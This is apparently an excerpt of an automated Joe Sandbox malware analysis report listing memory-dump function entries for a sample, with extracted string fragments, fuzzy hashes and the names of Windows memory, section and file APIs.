Total number of Limit Nodes: 12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$6$0#$0W$0W$p]$p]$x!
                                                                                            • API String ID: 0-4112077634
                                                                                            • Opcode ID: 1ba552c15d52cc76e2eea739d4aefdd034baa6f9b6a5ebc622ce49a422267af3
                                                                                            • Instruction ID: a852e272ecad0e6b7c2de0cb417f1872228e09fca4dbda7f6744e96cb3b00c74
                                                                                            • Opcode Fuzzy Hash: 1ba552c15d52cc76e2eea739d4aefdd034baa6f9b6a5ebc622ce49a422267af3
                                                                                            • Instruction Fuzzy Hash: 0F03C831E5861A8FEB5CDB2C885567873E5FB95300F1481B9E88ED7292DE34EC468BC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: _$r6$r6$r6$r6$r6$r6$r6$r6
                                                                                            • API String ID: 0-3859918097
                                                                                            • Opcode ID: e27fdc2ddbb6e8e6913bb2bc93653bc8fd2620f5e26d000ff60f825975160f8c
                                                                                            • Instruction ID: c65e85f81cf7cbd6dd004fb9dcfc484a5e4c967033130ca8c86087d26d21f813
                                                                                            • Opcode Fuzzy Hash: e27fdc2ddbb6e8e6913bb2bc93653bc8fd2620f5e26d000ff60f825975160f8c
                                                                                            • Instruction Fuzzy Hash: F8824D30A9990A8BF658DB18C55577573D6EF96305F6480BCE00E87282DF2AFC86C6C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0K_H$0W$P*$P/$[
                                                                                            • API String ID: 0-4052603944
                                                                                            • Opcode ID: 6cbecccdb6bc0d55ce93fa1e36fde824c6ec9b2843acaa33913baff1fb860791
                                                                                            • Instruction ID: 4bb3a89873156492028d1f5bfa28cd2e70bca361d83ca0e240f609b12d79b14d
                                                                                            • Opcode Fuzzy Hash: 6cbecccdb6bc0d55ce93fa1e36fde824c6ec9b2843acaa33913baff1fb860791
                                                                                            • Instruction Fuzzy Hash: D6227932B4EA4A8FF758976CA85517577D6EF9631071482BAE00EC7397ED24EC0A87C0

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: r6$r6$r6$r6
                                                                                            • API String ID: 0-1756432014
                                                                                            • Opcode ID: ac2d65c49c12faf3560345b3fdf4ec2f5bef73963d6b0a6081cb420abe17f782
                                                                                            • Instruction ID: 1764a0ec3f8e871781352e72f2be167c86e4c7f44a68a826d3e89665f0a60975
                                                                                            • Opcode Fuzzy Hash: ac2d65c49c12faf3560345b3fdf4ec2f5bef73963d6b0a6081cb420abe17f782
                                                                                            • Instruction Fuzzy Hash: C032F630A8DA4A8FE758DB2CC49597577E1EF95300B1485BDE04FC72A6DE26EC4AC780

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$"?(P$I$MQ3X
                                                                                            • API String ID: 0-1281571121
                                                                                            • Opcode ID: 6a31e60a91c91c8efb48b428ea8708021942df4855a88de1570a4c09ac2ca1b4
                                                                                            • Instruction ID: 69370ddb907b19b7a48660e60deb78d1869fe16f096d63651edf52409a04430b
                                                                                            • Opcode Fuzzy Hash: 6a31e60a91c91c8efb48b428ea8708021942df4855a88de1570a4c09ac2ca1b4
                                                                                            • Instruction Fuzzy Hash: 03F1E732B5990B8FFB98DB2884556BD73D6EFD5310B154179E00EDB2D2ED24EC4A8780
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$"?(P$I
                                                                                            • API String ID: 0-106835810
                                                                                            • Opcode ID: d880052ae330b4519f1f0b4ba87629e0902620e0f90eb8a109cf61119ecbb5bf
                                                                                            • Instruction ID: 4a7fbe362cab756e9d3b476687c99ad069d3ec812874940cfba3eeb1846aeb46
                                                                                            • Opcode Fuzzy Hash: d880052ae330b4519f1f0b4ba87629e0902620e0f90eb8a109cf61119ecbb5bf
                                                                                            • Instruction Fuzzy Hash: 30810722A5A94B8FFB9C9729885527D62C7EBD9210F558179E00ECB3D1FD38EC0A4780

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$"?(P$I
                                                                                            • API String ID: 0-106835810
                                                                                            • Opcode ID: 262c1f5e10b1fa17d9f9cf2dffbf19d428c848889dbd6813eb4c294175b6bb3a
                                                                                            • Instruction ID: 4f5f464e3adda9499493ea29ab5bf37e872dc5f107be996e50c02bc0edd5948e
                                                                                            • Opcode Fuzzy Hash: 262c1f5e10b1fa17d9f9cf2dffbf19d428c848889dbd6813eb4c294175b6bb3a
                                                                                            • Instruction Fuzzy Hash: CE810822B5A54B8FFB9C9729885527D62CBEBD9250F55817DE00ECB3D1FD38EC0A4680
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 286$[X~$
                                                                                            • API String ID: 0-741886506
                                                                                            • Opcode ID: d1bd93ed21a545215d725be5e7f8edca234adffe5bde79840579261cd4190d13
                                                                                            • Instruction ID: 15e92ff4b30074ed3b0def477c71c709c145f840f22710a16dad2746ceb426c1
                                                                                            • Opcode Fuzzy Hash: d1bd93ed21a545215d725be5e7f8edca234adffe5bde79840579261cd4190d13
                                                                                            • Instruction Fuzzy Hash: CA923DB291E7958FE375DB28C4469AA77D1EF95300F0409ADF48D8B292DE34E805C7C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (P"$(P"
                                                                                            • API String ID: 0-373186703
                                                                                            • Opcode ID: 54dffc625c7a70f0e8da90d891e685c4ba8003da9f25c21e3d0a08eb9f16a4de
                                                                                            • Instruction ID: e2c5c2888dc278412bc90286db30745f29111b8b9364351a25a22511873a4011
                                                                                            • Opcode Fuzzy Hash: 54dffc625c7a70f0e8da90d891e685c4ba8003da9f25c21e3d0a08eb9f16a4de
                                                                                            • Instruction Fuzzy Hash: F432FF7095DA0A8FE719DB18C4A49B573E1FF95304B208A7DE08F87796DA35F84AC780
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: b4$d
                                                                                            • API String ID: 0-2243634771
                                                                                            • Opcode ID: 6fbfbc80007546de252b2881e945d476ad617a01aaf9965b8ea520eed1875ad7
                                                                                            • Instruction ID: bb6f3daa48f378277f105e478372d8bb3ef08567cdb71daefbd3927ccb0265fc
                                                                                            • Opcode Fuzzy Hash: 6fbfbc80007546de252b2881e945d476ad617a01aaf9965b8ea520eed1875ad7
                                                                                            • Instruction Fuzzy Hash: F2125431A59A468FE31DDB28C465471B7E6EB97304B1486BEE48FC7297CE24F8078781
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A$p]
                                                                                            • API String ID: 0-418350652
                                                                                            • Opcode ID: f1fd690682c036540f8201f9b8379955d9e21c0d97b70733bfb5b4ebf9b2239e
                                                                                            • Instruction ID: 03a7e582b6f5d4fe869f1f045e6d207466e06258f1cd620aa4d33a40fb88e63e
                                                                                            • Opcode Fuzzy Hash: f1fd690682c036540f8201f9b8379955d9e21c0d97b70733bfb5b4ebf9b2239e
                                                                                            • Instruction Fuzzy Hash: 81B12732E5962A8BFB5CD62C845567873D6EB99310F0582BDE88FD3392DD24EC4687C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93bf971515b95bd653b1477042b785bf93bb522ff944b7a2cd36787f228071a8
                                                                                            • Instruction ID: 4e773791343f696a05f6ce61c47c42fe3f822ce8e2b8e7e161d9cb5a20e18667
                                                                                            • Opcode Fuzzy Hash: 93bf971515b95bd653b1477042b785bf93bb522ff944b7a2cd36787f228071a8
                                                                                            • Instruction Fuzzy Hash: F5038521B6991A8FF348AB6CD8A567873D6EB59740F4085FDF40EC33E7CD14AC468682
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: #;<G
                                                                                            • API String ID: 0-548829297
                                                                                            • Opcode ID: e9f7af21d5daa1fcaf28940a40ed59fb2e2582aafddb04e2876dd4e7f57d68cb
                                                                                            • Instruction ID: 96e9ccac8e93ca4a307b5a050b718b900ca2a992250eb9bde7eac522855c045f
                                                                                            • Opcode Fuzzy Hash: e9f7af21d5daa1fcaf28940a40ed59fb2e2582aafddb04e2876dd4e7f57d68cb
                                                                                            • Instruction Fuzzy Hash: 33722D7291E7928FE7659B28C445AEA77D1EF95300F0105BDE48D8B2D2EE34AC45C7C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: r6
                                                                                            • API String ID: 0-2984296541
                                                                                            • Opcode ID: 58966d524b5a8438e324affcc76e7f3ea5550199f92ee9a12e15444a7bf3a539
                                                                                            • Instruction ID: e33f9989846826fca44befb18e4b12f8e328e5aad9e9540c2bead516715adb02
                                                                                            • Opcode Fuzzy Hash: 58966d524b5a8438e324affcc76e7f3ea5550199f92ee9a12e15444a7bf3a539
                                                                                            • Instruction Fuzzy Hash: 8E626030959A0DCFDB98EB28C498A6577E1FF55304B5485ADE04FCB1A2DB36EC46CB80
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: j2J
                                                                                            • API String ID: 0-3209675307
                                                                                            • Opcode ID: 4987f09c6df9cda4fd47b3d508130aa8860324e64feb7c73109ffadc3a0a78fb
                                                                                            • Instruction ID: 4f0982e05efe6e79cc4ac6a302bb483e00386be89ae3bda6cca84336022a3016
                                                                                            • Opcode Fuzzy Hash: 4987f09c6df9cda4fd47b3d508130aa8860324e64feb7c73109ffadc3a0a78fb
                                                                                            • Instruction Fuzzy Hash: 4F6228B2A1E7968FE774DB28C446AAA77D1EF95300F01056DE08D87292EE34E845C7C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 099d01c6fca552124f1c2ab2bde21c7bc1c55217f987aa464dc3235306570126
                                                                                            • Instruction ID: b61617477f5176407f90de82f33ad002faa4823bd259603683dce73e531fcb08
                                                                                            • Opcode Fuzzy Hash: 099d01c6fca552124f1c2ab2bde21c7bc1c55217f987aa464dc3235306570126
                                                                                            • Instruction Fuzzy Hash: 1081A571908A1D8FEB98DB58D845BE977F1FB59310F1082AAD40ED3252DE34A989CFC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :j2P
                                                                                            • API String ID: 0-2106166442
                                                                                            • Opcode ID: 91ccf67c752fc3210ba20e71511721da72f3828164a5b59ea5b06dcd8c61181c
                                                                                            • Instruction ID: e4b4c545f7e6c5012f00f736f4d43f36c0edb5d586584ba3b57565af29594bbf
                                                                                            • Opcode Fuzzy Hash: 91ccf67c752fc3210ba20e71511721da72f3828164a5b59ea5b06dcd8c61181c
                                                                                            • Instruction Fuzzy Hash: DED1F171A6D74A8BE31C972C884717577D9EB8A304F14857DE98FC7297ED18E80782C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0W
                                                                                            • API String ID: 0-1461859783
                                                                                            • Opcode ID: 4fa2ae6d631439d4c1f15cdedb1711a0a272354d9add3a7ce77801df2f119867
                                                                                            • Instruction ID: 57efeea10eac6de93eabf9007ec18c2aec1257ce6f3a02c7599ea32034a8a1b3
                                                                                            • Opcode Fuzzy Hash: 4fa2ae6d631439d4c1f15cdedb1711a0a272354d9add3a7ce77801df2f119867
                                                                                            • Instruction Fuzzy Hash: A9D12A31749A4A8FF758E72D985913877D6EF9A21170941BAE00ECB3E2ED14EC4AC780
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: SectionView
                                                                                            • String ID:
                                                                                            • API String ID: 1323581903-0
                                                                                            • Opcode ID: 6ce05990b2233ac30e1e1dc0f8d92d0d8f1da544e746febaa0bda4e10a684002
                                                                                            • Instruction ID: f038056b0137f40a199d4be7f8103b0798093df94ebad3f442c01d6304ecd6eb
                                                                                            • Opcode Fuzzy Hash: 6ce05990b2233ac30e1e1dc0f8d92d0d8f1da544e746febaa0bda4e10a684002
                                                                                            • Instruction Fuzzy Hash: B3519E7191CB4C8FDB28DF58D8466ADBBF1FB99320F10426EE049D3256CB70A8458BC2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 7)
                                                                                            • API String ID: 0-3372029826
                                                                                            • Opcode ID: 5ba9643bbdf9b402a148101fe1017d009e458bc25a5c63f705ca381949ce0a5d
                                                                                            • Instruction ID: 3c7c184226f9e7c607fd7ea3f04871612c835942841ee0a2e90df540104e8bae
                                                                                            • Opcode Fuzzy Hash: 5ba9643bbdf9b402a148101fe1017d009e458bc25a5c63f705ca381949ce0a5d
                                                                                            • Instruction Fuzzy Hash: 6FF10970E0A50D9FEB58DF98E5956ACB7F2FF59300F24516AE00AE7391DA34AE05CB40
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateSection
                                                                                            • String ID:
                                                                                            • API String ID: 2449625523-0
                                                                                            • Opcode ID: f4425a91f687aa87ad54c54443c34747567f064b32d202d8511dcaf69a400dc4
                                                                                            • Instruction ID: bd08920db0b35725f7b27e908a5937c726bc017a11b61e4a41f93d62413bd25b
                                                                                            • Opcode Fuzzy Hash: f4425a91f687aa87ad54c54443c34747567f064b32d202d8511dcaf69a400dc4
                                                                                            • Instruction Fuzzy Hash: E141B47190CB4C8FDB58DF58D845AED7BE1EB99321F04426FE44ED3252CA74A8458BC2
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: ControlDeviceFile
                                                                                            • String ID:
                                                                                            • API String ID: 3512290074-0
                                                                                            • Opcode ID: 2be6333f64192a376397da83f3b6c7c8a573e3ba6b670cf6bbd077cb6ce840e1
                                                                                            • Instruction ID: a19c720f2a097b2b1f8138b0ece1b37d417235c2a656663e4c841e485480967d
                                                                                            • Opcode Fuzzy Hash: 2be6333f64192a376397da83f3b6c7c8a573e3ba6b670cf6bbd077cb6ce840e1
                                                                                            • Instruction Fuzzy Hash: 8641A07191CB4C8FDB58EF58D845AED7BE1FBA9320F04426EE449D3252CB74A8458BC2
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileOpen
                                                                                            • String ID:
                                                                                            • API String ID: 2669468079-0
                                                                                            • Opcode ID: d7d101417485482090ca13c2d13205c912069a20919f56a6039ed96942aa4761
                                                                                            • Instruction ID: 4e184b14773307a45d8b046cb31e6aff8c01dec1250c0a9b31eb1e419bd82de7
                                                                                            • Opcode Fuzzy Hash: d7d101417485482090ca13c2d13205c912069a20919f56a6039ed96942aa4761
                                                                                            • Instruction Fuzzy Hash: DF41B67190CB5C8FDB18DF68D8456FD7BE1EB99321F0442AFE04ED3252CA74A8458B82
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2706961497-0
                                                                                            • Opcode ID: 28531cb548b3e631c52d54826835f12347532645711a49fccd4430279478ee3d
                                                                                            • Instruction ID: 7af11d82fa99aff7829740b71d0384c3e89f4eaab020a028a969f18f20b92f79
                                                                                            • Opcode Fuzzy Hash: 28531cb548b3e631c52d54826835f12347532645711a49fccd4430279478ee3d
                                                                                            • Instruction Fuzzy Hash: F741B67190CB488FDB18DB5CD8566ED7BE1EB99320F00826FE04ED3292CE74A8458BC1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: ee113c61fefe028553792b3f09e74a17549173502cbe95770dbe663e510708cd
                                                                                            • Instruction ID: 821ba00c2747ce8745532bb6135d93790b158c7eafd8f209cc3eacc8c756f8cb
                                                                                            • Opcode Fuzzy Hash: ee113c61fefe028553792b3f09e74a17549173502cbe95770dbe663e510708cd
                                                                                            • Instruction Fuzzy Hash: 8741927190CB4C8FDB19DFA8D8556ED7BE1EF95321F04426FE04DD3292CA74A8458B82
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileInformationQueryVolume
                                                                                            • String ID:
                                                                                            • API String ID: 634242254-0
                                                                                            • Opcode ID: 679525f26dc6fc9f8674bdf18b99e235ae1dcbf2a52767c59602e9da219da5d0
                                                                                            • Instruction ID: 48a86f456fcf1bd20d0edc0ca9380d5ed5f355667447c906d147eb3b4567e0af
                                                                                            • Opcode Fuzzy Hash: 679525f26dc6fc9f8674bdf18b99e235ae1dcbf2a52767c59602e9da219da5d0
                                                                                            • Instruction Fuzzy Hash: D541F67190CB4C8FDB199B68D8556F97BE1EF56310F04426FE04AC3292CB74A4568792
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: SectionUnmapView
                                                                                            • String ID:
                                                                                            • API String ID: 498011366-0
                                                                                            • Opcode ID: c36d9afaac934ae668aa070686286623ae64f352a8ab2c00441febdb16720906
                                                                                            • Instruction ID: cb84d8f7928f88fcd96241fa986c6f6dd2360f8142508691c3419d61c13620fc
                                                                                            • Opcode Fuzzy Hash: c36d9afaac934ae668aa070686286623ae64f352a8ab2c00441febdb16720906
                                                                                            • Instruction Fuzzy Hash: 1531DB7190CB488FEB29DBA8D8166F97BE1EB56321F00416FD04EC3292DE64A405CB91
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 2e1d7bb0b654a12f426e34ab4a8870c17aef72e4195768f89dcede44e00bc6fa
                                                                                            • Instruction ID: fc245b5dfa22bfdc9a4e028dd505a97b9dbd919aa27380e7a27a8eeb1d47ef12
                                                                                            • Opcode Fuzzy Hash: 2e1d7bb0b654a12f426e34ab4a8870c17aef72e4195768f89dcede44e00bc6fa
                                                                                            • Instruction Fuzzy Hash: 3431F77190C64C8FEB59DBA884567FD7BE1EF56321F04826FD04EC3292DA74A405CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :j2P
                                                                                            • API String ID: 0-2106166442
                                                                                            • Opcode ID: a89057c46fc6e685383672b3ea747fbaa7f0415e94d86e1133899e51aeb47afe
                                                                                            • Instruction ID: 1f2d8922c685979795bb2e0a59bb0e8cf4d7e923528d9d2f7fcc6a7758472339
                                                                                            • Opcode Fuzzy Hash: a89057c46fc6e685383672b3ea747fbaa7f0415e94d86e1133899e51aeb47afe
                                                                                            • Instruction Fuzzy Hash: 96810461AAD7464FE31C963C58071357ADAEB86200B14D27DF9CFCB297F918E81782C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2'E
                                                                                            • API String ID: 0-101737470
                                                                                            • Opcode ID: 53ac70e73630c8d582eed9303855e7225f946f94159d93daf0d44acdc29122c2
                                                                                            • Instruction ID: 79499b0c9072c638fe68d0f65a3244804cd600c7640d673d0713d079bd61eea5
                                                                                            • Opcode Fuzzy Hash: 53ac70e73630c8d582eed9303855e7225f946f94159d93daf0d44acdc29122c2
                                                                                            • Instruction Fuzzy Hash: 5C910131A5A70ACFF358AB38845527576D6EF82300F508579E80ECB793ED29EC4AC780
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: A==>
                                                                                            • API String ID: 0-2245444498
                                                                                            • Opcode ID: 31529e0e4876573183214073b2cf076b13d9bb17a392a922168c7c80bbc2995b
                                                                                            • Instruction ID: 8ffb1ba0e0127f58d98af265bd4c7933b2369f8e7e15d0554b86c4f8f927aab9
                                                                                            • Opcode Fuzzy Hash: 31529e0e4876573183214073b2cf076b13d9bb17a392a922168c7c80bbc2995b
